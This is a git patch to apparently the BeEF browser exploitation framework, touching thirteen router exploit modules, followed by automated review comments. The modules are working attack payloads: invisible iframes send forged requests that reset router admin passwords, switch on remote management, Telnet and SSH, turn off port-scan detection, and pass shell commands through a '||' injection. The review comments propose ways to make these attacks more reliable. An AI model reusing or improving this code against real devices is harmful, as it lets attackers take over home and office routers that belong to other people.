From 639d0611a63074262a8e20915079b095df1d4e70 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 27 May 2013 11:56:01 +0930 Subject: [PATCH] Add `command_id` to embedded iframe/img IDs for router exploits This prevents a race condition where duplicate iframes/imgs are created if a module is run twice simultaneously. The second iframe/img was not being removed during `cleanup()`. --- .../3com_officeconnect_cmd_exec/command.js | 7 ++-- .../router/asmax_ar804gu_cmd_exec/command.js | 2 +- .../router/bt_home_hub_csrf/command.js | 18 +++++----- .../router/cisco_e2400_csrf/command.js | 11 +++--- .../router/comtrend_ct5367_csrf/command.js | 17 +++++----- .../router/comtrend_ct5624_csrf/command.js | 17 +++++----- .../router/dlink_dir_615_csrf/command.js | 7 ++-- .../router/dlink_dsl500t_csrf/command.js | 9 ++--- .../router/huawei_smartax_mt880/command.js | 13 +++---- .../router/linksys_befsr41_csrf/command.js | 10 +++--- .../router/linksys_wrt54g2_csrf/command.js | 11 +++--- .../router/linksys_wrt54g_csrf/command.js | 34 ++++++++++--------- .../router/virgin_superhub_csrf/command.js | 25 +++++++------- 13 files changed, 97 insertions(+), 84 deletions(-) diff --git a/modules/exploits/router/3com_officeconnect_cmd_exec/command.js b/modules/exploits/router/3com_officeconnect_cmd_exec/command.js index 0c96f5688..5f36c9bd6 100644 --- a/modules/exploits/router/3com_officeconnect_cmd_exec/command.js +++ b/modules/exploits/router/3com_officeconnect_cmd_exec/command.js @@ -9,8 +9,9 @@ beef.execute(function() { var gateway = '<%= @base %>'; var path = 'utility.cgi'; var cmd = '<%= @cmd %>'; + var timeout = 15; - var com_officeconnect_iframe = beef.dom.createIframeXsrfForm(gateway + path, "GET", [ + var com_officeconnect_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [ {'type':'hidden', 'name':'testType', 'value':'1'}, {'type':'hidden', 'name':'IP', 'value':'||'+cmd} ]); 
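Review bot: `var cmd = '<%= @cmd %>';` drops the operator-supplied command straight into a single-quoted JavaScript literal with no escaping, so a command containing `'`, a backslash or a newline turns into a syntax error and the module silently never fires (the same applies to `var gateway = '<%= @base %>';`). The hidden-field value `'||'+cmd` is form-encoded by the browser on submit and needs nothing further, so only the literal needs attention. Emitting the value as a JSON string on the template side — e.g. `var cmd = <%= @cmd.to_json %>;`, assuming the BeEF template environment has a JSON encoder loaded — covers every quoting case; at minimum `\` and `'` should be escaped before interpolation. The enclosing `beef.execute(function() {` begins above this hunk.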
@@ -18,9 +19,9 @@ beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(com_officeconnect_iframe); + document.body.removeChild(com_officeconnect_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js b/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js index d0417c2fb..9a7da976c 100644 --- a/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js +++ b/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js @@ -14,7 +14,7 @@ beef.execute(function() { img.setAttribute("style","visibility:hidden"); img.setAttribute("width","0"); img.setAttribute("height","0"); - img.id = 'asmax_ar804gu'; + img.id = 'asmax_ar804gu_<%= @command_id %>'; img.src = gateway+path+cmd; document.body.appendChild(img); diff --git a/modules/exploits/router/bt_home_hub_csrf/command.js b/modules/exploits/router/bt_home_hub_csrf/command.js index 7cb16cccd..2ab008044 100644 --- a/modules/exploits/router/bt_home_hub_csrf/command.js +++ b/modules/exploits/router/bt_home_hub_csrf/command.js 
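Review bot: The `_<%= @command_id %>` suffix on `com_officeconnect_iframe` cannot be what fixes the duplicate-iframe problem, because that name is a `var` inside the `beef.execute(function() { … })` closure and was already private to each run; the state actually shared between two simultaneous runs is `cleanup`, which is assigned without `var` (a global) and invoked through `setTimeout("cleanup()", …)`, a string evaluated in global scope that calls whichever run assigned `cleanup` last. With two runs in one page both timers therefore call the same function, the first call removes one iframe, the second `removeChild` throws, and the other iframe is never removed — consistent with the symptom in the commit message — unless `beef.execute` re-scopes the code in a way not visible here. Passing a closure removes both the global and the string eval (which a CSP without `'unsafe-eval'` would also block): `setTimeout(function() { document.body.removeChild(com_officeconnect_iframe_<%= @command_id %>); }, timeout*1000);`. The `beef.execute` callback begins above this hunk.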
@@ -6,21 +6,21 @@ beef.execute(function() { var gateway = '<%= @base %>'; - var passwd = '<%= @password %>'; + var passwd = '<%= @password %>'; + var timeout = 15; - - - var bt_home_hub_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST", - [{'type':'hidden', 'name':'0', 'value':'31'} , - {'type':'hidden', 'name':'1', 'value':''}, - {'type':'hidden', 'name':'30', 'value':passwd}]); + var bt_home_hub_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST", [ + {'type':'hidden', 'name':'0', 'value':'31'} , + {'type':'hidden', 'name':'1', 'value':''}, + {'type':'hidden', 'name':'30', 'value':passwd} + ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(bt_home_hub_iframe); + document.body.removeChild(bt_home_hub_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/cisco_e2400_csrf/command.js b/modules/exploits/router/cisco_e2400_csrf/command.js index fc226fa83..3a807e582 100644 --- a/modules/exploits/router/cisco_e2400_csrf/command.js +++ b/modules/exploits/router/cisco_e2400_csrf/command.js @@ -7,8 +7,9 @@ beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; + var timeout = 15; - var cisco_e2400_iframe1 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", + var cisco_e2400_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", [ {'type':'hidden', 'name':'submit_button', 'value':'Management'}, {'type':'hidden', 'name':'change_action', 'value':''}, 
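Review bot: The target URL `gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5"` starts with a slash while the sibling modules append a bare path (`gateway + "apply.cgi"`, `gateway + "tools_admin.php"`), so if `@base` arrives with a trailing slash — as those modules appear to assume — this one requests `//cgi/b/ras//…`; whether the hub tolerates the doubled slash is not something I can confirm from here, but the modules should agree on one convention. Separately, `var passwd = '<%= @password %>';` embeds the password in a JS literal unescaped, so a `'` in the chosen password breaks the script; emitting it as a JSON string (`var passwd = <%= @password.to_json %>;`, if the template has a JSON encoder) closes that gap. The `beef.execute(function() {` line is above this hunk.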
@@ -37,7 +38,7 @@ beef.execute(function() { {'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'}, ]); - var cisco_e2400_iframe2 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", + var cisco_e2400_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", [ {'type':'hidden', 'name':'submit_button', 'value':'Firewall'}, {'type':'hidden', 'name':'change_action', 'value':''}, @@ -59,10 +60,10 @@ beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(cisco_e2400_iframe1); - document.body.removeChild(cisco_e2400_iframe2); + document.body.removeChild(cisco_e2400_iframe1_<%= @command_id %>); + document.body.removeChild(cisco_e2400_iframe2_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/comtrend_ct5367_csrf/command.js b/modules/exploits/router/comtrend_ct5367_csrf/command.js index ec750b7e3..b9917bf6a 100644 --- a/modules/exploits/router/comtrend_ct5367_csrf/command.js +++ b/modules/exploits/router/comtrend_ct5367_csrf/command.js 
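Review bot: In `cleanup()` the two `removeChild` calls are sequential and unguarded, so if the first throws — for example because the iframe is already gone, which is exactly what happens today when two runs share the global `cleanup` — the second never executes and `cisco_e2400_iframe2_<%= @command_id %>` is leaked, the very symptom the commit sets out to fix. Guarding each removal makes cleanup idempotent: `var f1 = cisco_e2400_iframe1_<%= @command_id %>; if (f1.parentNode) f1.parentNode.removeChild(f1);` and the same two lines for the second iframe. Note also that `cleanup = function() {…}` is assigned without `var`, so it is one global shared by every module run; passing the function object to `setTimeout` instead of the string `"cleanup()"` would scope it per run. The `beef.execute` callback begins above this hunk.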
@@ -6,12 +6,13 @@ beef.execute(function() { var gateway = '<%= @base %>'; - var passwd = '<%= @password %>'; + var passwd = '<%= @password %>'; + var timeout = 15; - var ct5367_iframe1 = beef.dom.createInvisibleIframe(); - ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); + var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe(); + ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); - var ct5367_iframe2 = beef.dom.createInvisibleIframe(); + var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe(); var form = document.createElement('form'); form.setAttribute('action', gateway + "password.cgi"); @@ -37,16 +38,16 @@ beef.execute(function() { input.setAttribute('value', passwd); form.appendChild(input); - ct5367_iframe2.contentWindow.document.body.appendChild(form); + ct5367_iframe2_<%= @command_id %>.contentWindow.document.body.appendChild(form); form.submit(); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(ct5367_iframe1); - document.body.removeChild(ct5367_iframe2); + document.body.removeChild(ct5367_iframe1_<%= @command_id %>); + document.body.removeChild(ct5367_iframe2_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/comtrend_ct5624_csrf/command.js b/modules/exploits/router/comtrend_ct5624_csrf/command.js index 1b740b447..08ecf84ae 100644 --- a/modules/exploits/router/comtrend_ct5624_csrf/command.js +++ b/modules/exploits/router/comtrend_ct5624_csrf/command.js 
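Review bot: The GET to `scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&…` is an undocumented magic string; from the parameter names it looks like it enables FTP, HTTP, ICMP, SNMP, SSH, Telnet and TFTP on the device, presumably with the repeated `1`/`3` values selecting which interfaces they listen on, but nothing in the file says so. A one-line comment above `ct5367_iframe1_<%= @command_id %>.setAttribute('src', …)` such as `// step 1: enable the router's remote services; step 2 (password.cgi form below) sets the admin passwords` would tell the next reader what the two iframes do and why both are needed, and a `// TODO confirm what the 1/3 values select` keeps the guess honest. The `password.cgi` form itself is built between the two hunks, and the `beef.execute` callback starts above this one.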
@@ -6,21 +6,22 @@ beef.execute(function() { var gateway = '<%= @base %>'; - var passwd = '<%= @password %>'; + var passwd = '<%= @password %>'; + var timeout = 15; - var ct5367_iframe1 = beef.dom.createInvisibleIframe(); - ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); + var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe(); + ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); - var ct5367_iframe2 = beef.dom.createInvisibleIframe(); - ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd); + var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe(); + ct5367_iframe2_<%= @command_id %>.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(ct5367_iframe1); - document.body.removeChild(ct5367_iframe2); + document.body.removeChild(ct5367_iframe1_<%= @command_id %>); + document.body.removeChild(ct5367_iframe2_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/dlink_dir_615_csrf/command.js b/modules/exploits/router/dlink_dir_615_csrf/command.js index 3adb3b1fe..8c7fd4599 100644 --- a/modules/exploits/router/dlink_dir_615_csrf/command.js +++ b/modules/exploits/router/dlink_dir_615_csrf/command.js 
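Review bot: `passwd` is concatenated into the `password.cgi` query string three times with no `encodeURIComponent`, so a password containing `&`, `#`, `%`, `+` or a space is truncated or decoded differently by the router, and `usrPassword`, `sysPassword` and `sptPassword` may end up set to something other than what the operator typed. Encode once and reuse it: `var pw = encodeURIComponent(passwd);` followed by `'/password.cgi?usrPassword='+pw+'&sysPassword='+pw+'&sptPassword='+pw`. Separately, this is the CT5624 module but every iframe is still named `ct5367_iframe…` — a copy-paste leftover that this rename would have been the natural moment to fix. The `beef.execute` callback begins above this hunk.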
@@ -7,8 +7,9 @@ beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; + var timeout = 15; - var dir615_iframe = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST", + var dir615_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST", [{'type':'hidden', 'name':'ACTION_POST', 'value':'1'} , {'type':'hidden', 'name':'apply', 'value':'Save Settings'}, {'type':'hidden', 'name':'admin_name', 'value':'admin'}, @@ -23,9 +24,9 @@ beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(dir615_iframe); + document.body.removeChild(dir615_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/dlink_dsl500t_csrf/command.js b/modules/exploits/router/dlink_dsl500t_csrf/command.js index f546bb08a..c48624322 100644 --- a/modules/exploits/router/dlink_dsl500t_csrf/command.js +++ b/modules/exploits/router/dlink_dsl500t_csrf/command.js @@ -6,9 +6,10 @@ beef.execute(function() { var gateway = '<%= @base %>'; - var passwd = '<%= @password %>'; + var passwd = '<%= @password %>'; + var timeout = 15; - var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST", + var dsl500t_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST", [{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} , {'type':'hidden', 'name':'security:settings/username', 'value':'admin'}, {'type':'hidden', 'name':'security:settings/password', 'value':passwd}, 
@@ -19,9 +20,9 @@ beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(dsl500t_iframe); + document.body.removeChild(dsl500t_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/huawei_smartax_mt880/command.js b/modules/exploits/router/huawei_smartax_mt880/command.js index 9ce6b9f2e..09667bd04 100644 --- a/modules/exploits/router/huawei_smartax_mt880/command.js +++ b/modules/exploits/router/huawei_smartax_mt880/command.js @@ -5,19 +5,20 @@ // beef.execute(function() { - var gateway = '<%= @base %>'; + var gateway = '<%= @base %>'; var username = '<%= @username %>'; - var passwd = '<%= @password %>'; + var passwd = '<%= @password %>'; + var timeout = 15; - var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe(); - huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70"); + var huawei_smartax_mt880_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe(); + huawei_smartax_mt880_iframe_<%= @command_id %>.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70"); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(huawei_smartax_mt880_iframe); + document.body.removeChild(huawei_smartax_mt880_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/linksys_befsr41_csrf/command.js b/modules/exploits/router/linksys_befsr41_csrf/command.js index 6580abf95..60cee7e6c 100644 --- a/modules/exploits/router/linksys_befsr41_csrf/command.js +++ b/modules/exploits/router/linksys_befsr41_csrf/command.js 
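Review bot: `username` and `passwd` are spliced into the `Action?user_id=…&priv=1&pass1=…&pass2=…&id=70` URL with no `encodeURIComponent`, so any `&`, `#`, `%`, `+` or space in either value corrupts the query — and because `pass1`/`pass2` must agree, a partially decoded password can make the router reject the change or store something the operator did not intend. Encode both at the point of use, `var u = encodeURIComponent(username);` and `var p = encodeURIComponent(passwd);`, and build the URL from `u` and `p`. The `priv=1` and `id=70` values look like a privilege level and a form id but are undocumented; a short comment above the `setAttribute('src', …)` line, hedged as an assumption, would help the next maintainer. The `beef.execute` callback begins above this hunk.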
@@ -5,15 +5,17 @@ // beef.execute(function() { + var timeout = 15; + + var befsr41_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe(); + befsr41_iframe_<%= @command_id %>.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0'); - var befsr41_iframe = beef.dom.createInvisibleIframe(); - befsr41_iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(befsr41_iframe); + document.body.removeChild(befsr41_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/command.js b/modules/exploits/router/linksys_wrt54g2_csrf/command.js index 3eb5248e8..5b1097a45 100644 --- a/modules/exploits/router/linksys_wrt54g2_csrf/command.js +++ b/modules/exploits/router/linksys_wrt54g2_csrf/command.js @@ -5,11 +5,12 @@ // beef.execute(function() { - var port = '<%= @port %>'; + var port = '<%= @port %>'; var gateway = '<%= @base %>'; - var passwd = '<%= @password %>'; + var passwd = '<%= @password %>'; + var timeout = 15; - var wrt54g2_iframe = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST", + var wrt54g2_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST", [{'type':'hidden', 'name':'MANAGE_USE_HTTP', 'value':'0'} , {'type':'hidden', 'name':'MANAGE_HTTP', 'value':'1'}, {'type':'hidden', 'name':'MANAGE_HTTP_S', 'value':'0'}, 
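Review bot: Unlike the sibling modules, this one interpolates `<%= @password %>` (twice) and `<%= @port %>` straight into the `Gozila.cgi?…` URL literal, so the values get neither JS-literal escaping nor URL encoding: a `'` breaks the script, and `&`, `#`, `%` or a space in the password alters the query so that `sysPasswd` and `sysPasswdConfirm` may diverge. Pull them into variables first — `var passwd = encodeURIComponent('<%= @password %>');` and `var port = encodeURIComponent('<%= @port %>');` — and build the URL from those, which also matches how `gateway`/`passwd`/`port` are handled elsewhere in this series; emitting the template values as JSON strings would close the quoting gap as well. The `beef.execute` callback begins above this hunk.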
@@ -27,9 +28,9 @@ beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(wrt54g2_iframe); + document.body.removeChild(wrt54g2_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/linksys_wrt54g_csrf/command.js b/modules/exploits/router/linksys_wrt54g_csrf/command.js index c235e32a2..668315b6e 100644 --- a/modules/exploits/router/linksys_wrt54g_csrf/command.js +++ b/modules/exploits/router/linksys_wrt54g_csrf/command.js 
@@ -5,31 +5,33 @@ // beef.execute(function() { - var port = '<%= @port %>'; + var port = '<%= @port %>'; var gateway = '<%= @base %>'; - var passwd = '<%= @password %>'; + var passwd = '<%= @password %>'; + var timeout = 15; - var wrt54g_iframe = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST", - [{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} , - {'type':'hidden', 'name':'http_enable', 'value':'1'}, - {'type':'hidden', 'name':'https_enable', 'value':'0'}, - {'type':'hidden', 'name':'PasswdModify', 'value':'1'}, - {'type':'hidden', 'name':'http_passwd', 'value':passwd}, + var wrt54g_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST", + [ + {'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} , + {'type':'hidden', 'name':'http_enable', 'value':'1'}, + {'type':'hidden', 'name':'https_enable', 'value':'0'}, + {'type':'hidden', 'name':'PasswdModify', 'value':'1'}, + {'type':'hidden', 'name':'http_passwd', 'value':passwd}, {'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd}, - {'type':'hidden', 'name':'_http_enable', 'value':'1'}, - {'type':'hidden', 'name':'remote_management', 'value':'1'}, - {'type':'hidden', 'name':'web_wl_filter', 'value':'1'}, - {'type':'hidden', 'name':'http_wanport', 'value':port}, - {'type':'hidden', 'name':'upnp_enable', 'value':'1'}, - {'type':'hidden', 'name':'layout', 'value':'en'} + {'type':'hidden', 'name':'_http_enable', 'value':'1'}, + {'type':'hidden', 'name':'remote_management', 'value':'1'}, + {'type':'hidden', 'name':'web_wl_filter', 'value':'1'}, + {'type':'hidden', 'name':'http_wanport', 'value':port}, + {'type':'hidden', 'name':'upnp_enable', 'value':'1'}, + {'type':'hidden', 'name':'layout', 'value':'en'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(wrt54g_iframe); + document.body.removeChild(wrt54g_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 
15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/virgin_superhub_csrf/command.js b/modules/exploits/router/virgin_superhub_csrf/command.js index ca60fc0e9..5c5e94b94 100644 --- a/modules/exploits/router/virgin_superhub_csrf/command.js +++ b/modules/exploits/router/virgin_superhub_csrf/command.js 
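Review bot: Most of this hunk is re-indentation of the `createIframeXsrfForm` field list, which buries the one functional change (the `_<%= @command_id %>` suffix and the `timeout` constant) in whitespace noise and makes the review harder than it needs to be; a list that enables remote management over plain HTTP and sets the admin password is exactly the payload a reviewer wants to check line by line. Keeping formatting-only changes in a separate commit, or at least stating them in the message, would help. On the code itself the same caveat as the rest of the series applies: `cleanup` is assigned without `var` and invoked via `setTimeout("cleanup()", …)`, so it remains a single global shared across concurrent runs; `setTimeout(function() { document.body.removeChild(wrt54g_iframe_<%= @command_id %>); }, timeout*1000);` would make it per-run. The `beef.execute` callback begins above this hunk.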
@@ -9,30 +9,31 @@ beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; var port = '<%= @port %>'; + var timeout = 15; - var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [ - {'type':'hidden', 'name':'NetgearPassword', 'value':passwd}, + var virgin_superhub_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [ + {'type':'hidden', 'name':'NetgearPassword', 'value':passwd}, {'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd}, - {'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'} + {'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'} ]); - var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [ - {'type':'hidden', 'name':'cbPortScanDetection', 'value':''} + var virgin_superhub_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [ + {'type':'hidden', 'name':'cbPortScanDetection', 'value':''} ]); - var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [ - {'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'}, - {'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port} + var virgin_superhub_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [ + {'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'}, + {'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(virgin_superhub_iframe1); - document.body.removeChild(virgin_superhub_iframe2); - document.body.removeChild(virgin_superhub_iframe3); + document.body.removeChild(virgin_superhub_iframe1_<%= @command_id %>); + document.body.removeChild(virgin_superhub_iframe2_<%= @command_id %>); + 
document.body.removeChild(virgin_superhub_iframe3_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); });
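Review bot: The three forms — password change (`RgSecurity`), disabling port-scan detection (`RgServices`) and enabling remote management on `port` (`RgVMRemoteManagementRes`) — are submitted at the same instant in three iframes, so the router processes them in whatever order the browser's connection scheduling and the embedded HTTP server happen to produce; if a password change on this firmware invalidates the session or the device serialises configuration writes, the later POSTs can be dropped while the module still reports `exploit attempted`. I cannot confirm the hub's behaviour from here, but sequencing the submissions removes the doubt: create the second iframe from the first one's `load` handler and the third from the second's, then schedule cleanup once the chain completes (note that a freshly created about:blank iframe may fire an early `load` in some browsers, so the handler should be attached after the form submission the helper performs). A comment above the first `createIframeXsrfForm` stating the intended order would document the dependency either way. The `beef.execute` callback begins above this hunk.

```javascript
var virgin_superhub_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
  // … unchanged: NetgearPassword / NetgearPasswordReEnter / RestoreFactoryNo fields …
]);
// Submit the remaining forms only after the password change has completed.
virgin_superhub_iframe1_<%= @command_id %>.onload = function() {
  var virgin_superhub_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
    {'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
  ]);
  // … same pattern: iframe3 created in iframe2's onload; cleanup of all three scheduled from iframe3's onload …
};
```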